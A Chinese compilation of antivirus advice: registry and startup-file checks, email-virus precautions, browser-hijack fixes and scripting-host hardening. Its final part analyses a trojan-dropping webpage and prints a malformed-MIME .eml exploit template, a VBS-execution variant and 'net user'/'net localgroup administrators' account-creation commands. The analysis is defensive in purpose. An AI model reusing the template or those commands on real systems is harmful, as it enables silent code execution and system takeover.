有人认为
杀毒是一件简单的事情,不就是点击
杀毒软件的“杀毒”按钮就行了吗?
不错,杀毒的确要借助
杀毒软件,但是不是说一点击杀毒就万事大吉的。这就是为什么有的人一次性就将病毒杀尽,有的人机子内的病毒永远也杀不完的原因了。杀毒也要讲技巧!
对于杀毒的设置本文就不做介绍了。
杀毒要讲环境。其实说真的,杀毒最好的环境就是用干净引导盘启动的DOS。但是如果每次出现病毒都到DOS下杀是不科学的!即费
时间,有减少DOS杀毒盘的寿命。那么,该怎么判断该在什么环境下杀毒呢?
一、被激活的非
系统文件内的病毒
杀这种病毒很简单,只需要在一般的Windows环境下杀就行了。一般都能将其歼灭。
二、已经被激活或发作的非系统文件内的病毒
如果在一般Windows环境下杀毒,效果可能会大
打折扣。虽然,现在的反病毒软件都能查杀内存病毒,但是此技术毕竟还未成熟,不一定能歼灭病毒。
因此,杀此类病毒应在Windows
安全模式下进行。在Windows安全模式下,这些病毒都不会在启动时被激活。因此,我们就能放心的杀毒了。
三、系统文件内病毒
这类病毒比较难缠,所以在操作前请先
备份。杀此类病毒一定要在干净的DOS环境下进行。有时候还要反复查杀才能彻底清除。
四、网络病毒(特别是通过局域网传播的病毒)
此类病毒必须在断网的情况下才能清除,而且清除后很容易重新被感染!要根除此类病毒必需靠网络管理员的努力了!
五、感染杀毒厂家有提供专用杀毒
工具的病毒
杀灭此类病毒好办,只需下载免费的专用杀毒工具就行了。专用杀毒工具杀毒精确性相对较高,因此我推荐在条件许可的情况下使用专用杀毒工具。
杀毒很讲究技巧,所以,选择适合自己的反病毒软件和时刻开启
监控很重要,还有千万别忘了升级哦!
杀毒技巧系列--
手工清除隐藏的病毒和木马
检查注册表
注册表一直都是很多木马和病毒“青睐”的寄生场所,注意在检查注册表之前要先给注册表备份。
1、检查注册表中HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Runserveice,查看键值中有没有自己不熟悉的自动启动文件,扩展名一般为EXE,然后记住木马程序的文件名,再在整个注册表中
搜索,凡是看到了一样的文件名的键值就要删除,接着到电脑中找到木马文件的藏身地将其彻底删除。
2、检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Main中的几项(如Local Page),如果发现键值被修改了,只要根据你的判断改回去就行了。恶意代码(如“万花谷”)就经常修改这几项。
3、检查HKEY_CLASSES_ROOT\inifile\shell\open\command和HKEY_CLASSES_ROOT \txtfile\shell\open\command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来,很多病毒就是通过修改. txt、.ini等的默认打开程序而清除不了的。
检查你的系统配置文件
其实检查系统配置文件最好的方法是打开Windows“系统配置
实用程序”(从开始菜单运行msconfig.exe),在里面你可以配置Config.sys、Autoexec.bat、system.ini和win.ini,并且可以选择启动系统的
时间。
1、检查win.
ini文件(在C:\windows\下),打开后,在?WINDOWS?下面,“run=”和“load=”是可能加载 “木马”程序的途径,必须仔细留心它们。在一般情况下,在它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。比如攻击
qq的“GOP木马”就会在这里留下痕迹。
2、检查system.ini文件(在C:\windows\下),在BOOT下面有个“shell=文件名”。正确的文件名应该是 “explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,然后你就要在硬盘找到这个程序并将其删除了。
杀毒技巧系列--坚决把 “
邮件病毒” 消灭
邮件病毒”其实和普通的电脑病毒一样,只不过由于它们的传播途径主要是通过电子邮件,所以才被称为“邮件病毒”,它们一般是通过邮件中“附件”夹带的方法进行扩散。现在就告诉大家把“邮件病毒”消灭在
邮箱之中应用八招。
1、选择一款正版的防毒软件。借
杀毒软件中的邮件监视功能,在邮件接收过程中对其进行病毒
扫描过滤
2、及时升级病毒库。病毒软件厂商天天都会更新病毒库,提供的升级服务是非常周到,如果用户不及时升级,就
很难对新病毒进行查杀。
3、打开实时
监控防火墙。防火墙最重要的功能就是邮件监视功能。
4、不要轻易打开陌生人的邮件附件,如果发现邮件中无内容,无附件,邮件自身的大小又有几十K或者更大,那么此邮件中极有可能包含有病毒;如果附件为可执行文件(.exe、.com)或word
文档时,要选择用杀毒软件的扫描查毒察看;如果发现收到的邮件对方地址非常陌生,域名对极不像正常的国内
邮箱,那就很有可能是收到病毒了;如果是双后缀那么极有可能是病毒,因为邮件病毒会选择隐藏在附件中,直接册除即可。
5、尽量不在“地址薄”中设置联系名单。因为一但被病毒感染,病毒会通过邮件“地址薄”中的联系人来传播。
6、少使用信纸模块。信纸模块都是一些脚本文件,如果模块感染了脚本病毒例如VBS/KJ、欢乐时光等,那用户使用信纸发出去的邮件都带有病毒了。
7、设置邮箱自动过滤功能。这样不仅能够防止垃圾邮件,还可以过滤掉一些带病毒邮件。
8、不使用邮件软件邮箱中的HTML预览功能。当今,一些传播与破坏力比较大的病毒,往往都是通过邮件预览时进行感染,并不需要打开邮件。
杀毒技巧系列--计算机防毒杀毒的六大常见误区
计算机防毒杀毒的六大常见误区
误区1:有了杀毒软件我就可以什么毒都不怕
真的有了杀毒软件就什么毒也不怕吗?答案肯定不行的,
病毒是不断有新的出现的,而且它的出现往往无法预料,杀毒软件也要不断更新,要不断升级才能对付新出现的病毒,即使这样,有很多时候杀毒软件升级到最新也不能杀掉全部的病毒,升级到最新,只是能让您的电脑拒绝更多的病毒,让您的电脑处于更安全的状态,并不意味着您就可以忽略电脑安全,平时还是要注意
共享安全;不要下载不明程序,不要打开不明网页等等。
误区2:装杀毒软件越多越好
前两天,笔者帮朋友装机,朋友不懂电脑,所以对我说:“装多几个杀毒软件吧,我怕上网很多毒。”晕倒?¥%?#……,真的装杀毒软件越多越好吗?其实不同厂商
开发的杀毒软件很容易引起冲突。不少杀毒厂商为了避免这种情况的发生,在安装的时候就检测电脑中是否安装有其他杀毒软件,目的就是为了避免两个杀毒软件同时使用的时候出现的冲突。而且,对于大部分的病毒,一般一个杀毒软件都可以杀掉,对付特殊病毒也有不少专杀工具。装的杀毒软件越多,除了可能出现冲突以外,还会消耗更多的系统资源,减慢电脑运行速度。装多几个杀毒软件,得益却没什么,失去效能就可能很大。所以,并不是杀毒软件越多越好。
误区3:杀毒软件能杀毒就行了
杀毒软件能杀毒就行?是不是等到病毒入侵然后才来杀毒?有些人 b了杀毒软件,想减小系统资源的消耗,会把杀毒软件关掉,当病毒入侵时候才用杀毒软件来杀毒。这种意识是不行的,现在病毒风行,可以无孔不入,一不小心,您就会很容易“中毒”,况且现在硬盘之大,令很多杀毒软件杀毒时间都很长;而且假如病毒入侵的时候才杀毒,那么可能您的系统早已崩溃,数据早已丢失,为时已晚,到时候损失就大了。因此,杀毒不是重点,防才是最重要。与其说是杀毒软件,不如说是防毒软件更好!
误区4:只要我不上网就不会有病毒
有些人的电脑连接到因特网,以为只要不打开网页上网就不会感染病毒,所以想不打开杀毒软件防毒。其实,虽然不少病毒是通过网页传播的,但是也有不少病毒不等您打开网页早已入侵您的机器,这个是必须防范的。冲击波,蠕虫病毒等等都会在您不知不觉中进入电脑。而且,盗版的光盘,软盘也会存在病毒。因此,只要您的电脑开着,最好就防着!
误区5:文件设置只读就可以避免病毒
设置只读,只是调用系统几个命令而已,而病毒也可以调用系统命令。因此,病毒可以改掉文件属性,严重的可以删掉重要文件,格式化硬盘,让系统崩溃!因此,设置只读,并不能有效防毒,不过对于局域网中为了共享安全,防止误删除,设置只读属性还是比较有用的。
误区6:病毒不感染数据文件
有人觉得,病毒是一段程序,而数据文件如.txt、.pcx等格式文件一般不会包含程序,因此不会感染病毒。殊不知像word、excel等数据文件由于包含了可执行码却会被病毒感染,而且,有些病毒可以让硬盘里面的文件全部格式化掉,因此,我们不能忽视数据文件的备份。
上面只介绍了常见的防毒杀毒误区,还有一些其它的误区,在我们使用电脑的时候都可能慢慢碰到的。在我们使用电脑的时候,最重要还是防毒,而能做好防毒,那就需要不断更新您的杀毒软件,同时注意打上系统地升级补丁。
杀毒技巧系列--恶意网页病毒十三种症状分析及简单修复方法
恶意网页病毒十三种症状分析及简单修复方法
一、对IE
浏览器产生破坏的网页病毒:
(一)默认主页被修改
1.破坏特性:默认主页被自动改为某网站的网址。
2.表现形式:
浏览器的默认主页被自动设为如********.COM的网址。
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main 分支,找到Default_Page_URL键值名(用来设置默认主页),在右窗口点击右键进行修改即可。按F5键刷新生效。
危害程度:一般
(二)默认首页被修改
1.破坏特性:默认首页被自动改为某网站的网址。
2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main分支,找到StartPage键值名(用来设置默认首页),在右窗口点击右键进行修改即可。按F5键刷新生效。
危害程度:一般
(三)默认的
微软主页被修改
1.破坏特性:默认
微软主页被自动改为某网站的网址。
2.表现形式:默认微软主页被篡改。
3.清除方法:
(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开: HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main 分支,找到 Default_Page_URL键值名(用来设置默认微软主页),在右窗口点击右键,将键值修改为
http://www.microsoft.com/windows/ie_intl/cn/start/ 即可。按F5键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到
记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"default_page_url"="
http://www.microsoft.com/windows/ie_intl/cn/start/" 危害程度:一般
(四)主页设置被屏蔽锁定,且设置选项无效不可更改
1.破坏特性:主页设置被禁用。
2.表现形式:主页地址栏变灰色被屏蔽。
3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\分支,新建 “ControlPanel”主键,然后在此主键下新建键值名为“HomePage”的DWORD值,值为“00000000”,按F5键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到
记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HomePage"=dword:00000000
危害程度:轻度
(五)默认的IE
搜索引擎被修改
1.破坏特性:将IE的默认微软搜索引擎更改。
2.表现形式:搜索引擎被篡改。
3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search分支,找到“SearchAssistant”键值名,在右面窗口点击“修改”,即可对其键值进行输入为:
http://ie.search.msn.com//srchasst/srchasst.htm ,然后再找到“CustomizeSearch”键值名,将其键值修改为:
http://ie.search.msn.com//srchasst/srchasst.htm ,按F5键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到
记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Search]
"SearchAssistant"="
http://ie.search.msn.com//srchasst/srchasst.htm" "CustomizeSearch"="
http://ie.search.msn.com//srchasst/srchasst.htm" 危害程度:一般
(六)IE标题栏被添加非法信息
1.破坏特性:通过修改注册表,使IE标题栏被强行添加宣传网站的广告信息。
2.表现形式:在IE顶端蓝色标题栏上多出了一些不知名网站信息。
3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main分支,找到“Window Title”键值名,输入键值为Microsoft Internet Explorer,按F5刷新。
第二,按如下顺序依次打开:HKEY_CURRENT_MACHINE\Software\Microsoft\ InternetExplorer\Main分支,找到“Window Title”键值名,输入键值为Microsoft Internet Explorer,按F5刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到
记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"
危害程度:一般
(七)OE标题栏被添加非法信息破坏特性:
破坏特性:通过修改注册表,在微软的集成电子邮件程序Microsoft Outlook顶端标题栏添加宣传网站的广告信息br]
表现形式:在顶端的Outlook Express蓝色标题栏添加非法信息。
清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Outlook Express分支,找到WindowTitle以及Store Root键值名,将其键值均设为空。按F5键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Outlook Express]
"WindowTitle"=""
"Store Root"=""
危害程度:一般
(八)鼠标
右键菜单被添加非法网站链接:
1.破坏特性:通过修改注册表,在鼠标右键弹出菜单里被添加非法站点的链接。
2.表现形式:添加“网址之家”等诸如此类的链接信息。
3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\MenuExt分支,在左边窗口凡是属于非法链接的主键一律删除,按F5键刷新生效。
4.危害程度:一般
(九)鼠标右键弹出菜单功能被禁用失常:
1.破坏特性:通过修改注册表,鼠标右键弹出菜单功能在IE浏览器中被完全禁止。
2.表现形式:在IE中点击右键毫无反应。
3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions分支,找到“NoBrowserContextMenu”键值名,将其键值设为“00000000”,按F5 键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000000
危害程度:轻度
(十)IE
收藏夹被强行添加非法网站的地址链接
破坏特性:通过修改注册表,强行在IE收藏夹内自动添加非法网站的链接信息。
表现形式:躲藏在收藏夹下。
清除方法:请用手动直接清除,用鼠标右键移动至该非法网站信息上,点击右键弹出菜单,选择删除即可。
危害程度:一般
(十一)在IE工具栏非法添加按钮
破坏特性:工具栏处添加非法按钮。
表现形式:有按钮图标。
清除方法:直接点击鼠标右键弹出菜单,选择“删除”即可。
危害程度:一般
(十二)锁定地址栏的下拉菜单及其添加文字信息
破坏特性:通过修改注册表,将地址栏的下拉菜单锁定变为灰色。
表现形式:不仅使下拉菜单消失,而且在其上覆盖非法文字信息。
清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Toolbar分支,在右边窗口找到“LinksFolderName”键值名,将其键值设为“链接”,多余的字符一律去掉,按F5键刷新生效。
危害程度:轻度
(十三)IE菜单“查看”下的“源文件”项被禁用
破坏特性:通过修改注册表,将IE菜单“查看”下的“源文件”项锁定变为灰色。
表现形式:“源文件”项不可用。
清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,第一,按如下顺序依次打开:HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions分支,找到"NoViewSource"键值名,将其键值设为“00000000”,按F5键刷新生效。
按如下顺序依次打开:HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions分支,找到"NoViewSource"键值名,将其键值设为“00000000”,按F5键刷新生效。
(2)自动文件导入注册表法:请把以下内容输入或粘贴复制到记事本内,以扩展名为reg的任意文件名存在C盘的任一目录下,然后执行此文件,根据提示,一路确认,即可显示成功导入注册表。
REGEDIT4
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
危害程度:轻度
防治脚本病毒的有效办法
防治电脑病毒的有效方法
类似于Homepage这种邮件型病毒让人防不胜防,实在让人有些头疼,由于Windows脚本宿主(Script Host)功能强大,VBScript和JScript脚本语言可以完成操作系统的大部分功能,于是他们也就成了病毒编写者的最爱,利用它来编制病毒程序不但容易,而且利用电子邮件来传递使得病毒的传播非常迅速,所以传统的杀毒软件对这种类型病毒的防治总会有一定的滞后性,所以我们必须自己采取一些有效措施来防治这类病毒,以保护的我们的数据和邮件免受侵害。
一、通用规则
1.发现邮箱中出现不明来源的邮件应小心谨慎对待,尤其是带有可执行附件的邮件,如.EXE、.VBS、.JS等
2.如非必要,尽量关闭邮件“预览”特性。很多嵌入在HTML格式邮件中的病毒代码会在预览的时候执行,我们经常从媒体看到这样一种恐怖说法:“用户只要收到这些带病毒的邮件,即使不打开,病毒也能发作”,其实就是病毒代码在邮件预览的时候执行的。
目前的邮件型病毒绝大多数由VBScript(JScript)编写或是在HTML格式邮件中嵌入Script,针对这些现状,提出以下几点解决办法:
二、防止病毒发作
Windows Script Host本来是被系统管理员用来配置
桌面环境和系统服务,实现最小化管理的一个手段,但对于大部分一般用户而言,WSH并没有多大用处,所以最好禁止 WSH,也就是禁止VBScript(JScript)文件的运行环境,如果在企业环境中,系统管理员禁止那些不需要VBScript(JScript) 的客户机,甚至比一台台地安装
防病毒软件更为简单有效。禁止了WSH后,可以防止大部分邮件型病毒的发作。
禁止VBScript(JScript)文件执行的几个办法:
1.在“我的电脑”—“工具”—“文件夹选项”对话框中,点击“文件类型”,删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射
2.在Windows目录中,找到WScript.exe和JScript.exe,更改其名称或者干脆删除
3.在Win9X和Windows NT 4.0上,可以通过控制面板中“添加/删除程序”项来安全删除WSH
另外,为了防止可能包含在Outlook邮件中出现的宏病毒的发作,请在选择菜单“工具”—“宏”—“安全性”,然后将安全级别设置为“高安全性”。
三、防止病毒发作后“复制”
VBScript(JScript)中的磁盘文件和目录操作几乎都是通过FileSystemObject类来实现的,而对于绝大多数一般户来说,FileSystemObject也没有什么大的作用,所以可以从注册表中删除或更名FileSystemObject类,使得病毒代码无法创建对象,从而可以有效防止病毒复制自身。
运行regedit.exe,然后查找Scripting.FileSystemObject,找到后可以删除该键值(Key Value)或更改键名(Key Name),在做此项操作之前,请最好备份注册表并检查评估此操作对其它相关应用程序可能造成的影响。
在企业环境中,系统管理员可以编制一个自动执行上述操作的VBScript(JScript)程序,来完成在所有客户机上快速配置(其它这才是Microsoft开发WSH的本意)。
四、防止病毒发作后“传播”
邮件型病毒几乎都是通过发送大量的携毒的电子邮件来实现的,所以如何防止病毒脚本取得“联系人”列表(通讯薄)并发送邮件,成为问题的关键。
病毒代码发邮件一般采取两种办法,一是利用Windows自带的CDO(Collaboration Data Object协作数据对象)或通过OOM (Outlook Object Model,Outlook对象模型)来发送,用CDO来发送邮件的时候,必须要有Microsoft SMTP服务器,如果机器上没有安装Microsoft SMTP服务器,病毒就不能发送邮件。注意:Win9X系统上不能安装SMTP服务器、Windows 2000 Professional默认不安装此服务,而Windows 2000 Server与Advanced Server默认情况下是安装此服务的。
1.如果机器已安装了SMTP服务器,可以通过给SMTP服务器加入安全验证,以避免病毒代码利用CDO来匿名发送邮件,详细信息极相关配置可参见Windows 2000 SMTP Server文档。
2.要阻止病毒利用Outlook来发送邮件,可以利用Outlook的“邮件传递推迟”特性,Outlook的这个特性可以让用户在撰写一个邮件并点击“发送”按纽后,邮件并不会马上提交给MTA (邮件
传输代理)来传输,而只是暂时保存在用户的“发件箱”文件夹中,待指定的时间过后,再进行真正的邮件发送。这个特性是通过Outlook的“规则” 来实现的,成功地设置了这样的规则后,如果你不小心打开并执行了Homepage这样的病毒代码,在一阵硬盘狂响之后,你就会马上注意到你的“发件箱”文件夹中有大量待发邮件突然出现,这样你就可以确认你的机器已遭到病毒的骚扰,你应该立即删除“发件箱”中的这些邮件,并从“已删除邮件”文件夹中清空,这样就可以保证病毒不会再由你这儿传播到其它人的邮箱中。另外,有了这个邮件延迟的特性,可以让你在不小心发错邮件后有更正的机会。
邮件传递推迟特性是通过创建Outlook规则来实现,具体步骤如下:
(1)打开Outlook,点击“工具”—“规则向导”菜单
(2)“新建”一个规则,选择“发送邮件后检查”,然后选择对那些邮件或所有邮件进行检查
(3)选择“传递推迟若干分钟”,占击“若干”二字,输入推迟的分钟数
(4)保存并应用此规则
(5)如果在企业环境中,系统管理员可以将此规则导出成文件,然后在客户机上直接导入就行了
注意:上述设置是针对Outlook的,目前版本的Outlook Express尚不支持创建这样的规则。
五、防止病毒发作后搞“破坏”
病毒发作后的破坏行动是多种多样的,其中比较严重就是对硬盘数据和文件进行破坏,一般情况下只要禁用FileObjectSystem对象就可以了。
通过以上的层层设防,您的系统就应该能
防御绝大多数针对于Outlook的邮件型病毒了。
另外,屡屡出现的电子邮件病毒总是把自己紧紧地跟Microsoft Outlook“绑”在一起,以致招来用户对Microsoft的众多责难,于是Microsoft痛定思痛,不断推出新的Outlook的安全补丁。在即将发布的Office XP的包含的Outlook 2002中不但全部禁用了HTML格式邮件中的脚本(Script)、ActiveX控件和Java Applet,而且对邮件的附件按类别分级处理,一级文件类型(例如.bat、.exe、.vbs和.js等)是被Outlook所冻结的,用户无法查看或访问此类附件。另外,当用户发送具有一级文件类型扩展名的附件时,将看到一条警告信息。如果文件类型属于二级,则只能将附件保存到硬盘上后,再决定如何进行处理。并且Outlook在其它程序访问“通讯簿”的时候给予用户提示,要求确认,这样从几个方面严格限制了病毒发作与传播。
80%用户对间谍软件入侵毫无察觉 ★病毒预防★
企业防护病毒之解决方案 ★病毒预防★
浏览网页也会中木马+解决办法 ★病毒预防★
如果我对你说浏览网页也会感染木马,你相信吗?
其实,这已经不是相信不相信的问题了,在半年前就有人使用这种技术来使人中招了!最近听说有人在浏览某个网站时中招,因此去那里看了看,在网页打开的过程中,鼠标奇怪的变成沙漏形状,看来的确是有程序在运行。打开计算机的任务管理器,可以看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe,在win98下为c:\windows\wincfg.exe。运行注册表编辑器 regedit,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Run发现wincfg.exe,哈哈,原来它将自己登记在注册表开机启动项中,这样每次开机都会自动运行wincfg.exe!
注:给你下套的人可以自己设定这个木马的启动键名和注册文件名,注册文件名也就是运行时进程里的名称,因此大家看到的结果可能不相同。
运行金山毒霸,报告发现“backdoor
bnlite”,哦,原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大(只有6.5K),但它的功能可不少:具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信(报告服务端所在的IP地址)、上传下载……如果你中了该木马,那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务,这样别人就有全部权限进入你的电脑了!控制你的电脑将非常容易!
让我感兴趣的是,木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全” →“自定义安全级别”,将ActiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,哈哈!这回wincfg.exe不再下载了。
我们来看看wincfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的一句:
IFRAME
src="wincfg.eml" width=1
height=1
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
打开a.eml,发现其内容如下:
From:
"xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57
+800
MIME-Version: 1.0
Content-Type:
multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority:
3
X-MSMail-Priority: Normal
X-Unsent:
1
--1
Content-Type:
multipart/alternative;
boundary="2"
--2
Content-Type:
text/html;
charset="gb2312"
Content-Transfer-Encoding:
quoted-printable
HTML>
HEAD>
/HEAD>
BODY
bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0
width=3D0>
/BODY>
--2--
--1
Content-Type:
audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding:
base64
Content-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)
--1
你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符,就是wincfg.exe经过base64编码的内容。上面这些代码中,关键的是下面这一段:
Content-Type:
audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding:
base64
Content-ID:
其中,name="wincfg.exe"这一句定义了文件名称,在此为wincfg.exe。
而这一句:Content-Transfer-Encoding:
base64则定义了代码格式为base64。
从这句Content-ID:
开始才是代码的起步,“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码,这个以 BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因!到此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIME头进行攻击。
1.MIME简介
MIME(Multipurpose
Internet Mail
Extentions),一般译作“多用途的网际邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或 text/plain)。
2.错误的MIME头漏洞的发现
该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型时存在个问题,攻击者可以创建一个Html格式的E- mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。在此,我们来了解一下,IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO
CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但令人恐惧的是,当攻击者更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。大家不妨想像一下,如果前面提到的wincfg.exe不是木马,而是恶意程序江民炸弹又会怎么样?刹那间,你的硬盘就完蛋了(如果你不懂解法的话)!在 Win9X\ME以及WinNT4和Win2k下的Internet
Explorer 5.0、5.01、5.5均存在该漏洞,我们常用的微软邮件客户端软件Outlook
Express也存在此漏洞。
3.错误的MIME头漏洞的危害
让我们来看一下如果把上面所说的代码中最后这部分变为下面这样,会产生什么结果呢?
--1
Content-Type:
audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding:
quoted-printable
Content-ID:
msgbox("你的计算机好危险哦")
说明:在此可以加上任意的VBS的代码
--1
将该程序编辑存为eml格式的文件,我们运行它,可以看到屏幕上打开一个窗体,显示“你的计算机好危险哦”。对于这种利用错误的MIME头漏调用VBS文件的形式,会有多大危害呢?想一想,当初的爱虫病毒是怎么样的?爱虫病毒还需要骗你执行它才使你中毒,但一旦和错误MIME头漏洞结合起来,就根本不需要你执行了,只要你收了这封信且阅读它,你就中招了。
不仅如此,MIME还可以与command、cmd命令相结合,进行进一步的攻击。
对于WIN9X用户来说,只要你的IE浏览器是5.0、5.01、5.5之中的任意一个版本,在没打补丁的情况下,攻击者完全可以利用欺骗的方式让你打开含有攻击命令的、带有错误MIME头的E-mail文件,达到攻击的目的。事实上,format、deletetree、move等一切MS -DOS下的命令均可加载在其中。
而对于WINNT、WIN2K用户,尤其是那些不安分守己且网络安全知识贫乏的系统管理员,利用公司的主服务器上网,攻击者可以给他发封信,然后利用在以上所示代码中加上诸如:
net
user test 1234567/add
net localgroup administrators
test/add
这样的命令增加用户或者超级用户权限,达到进一步入侵的目的。
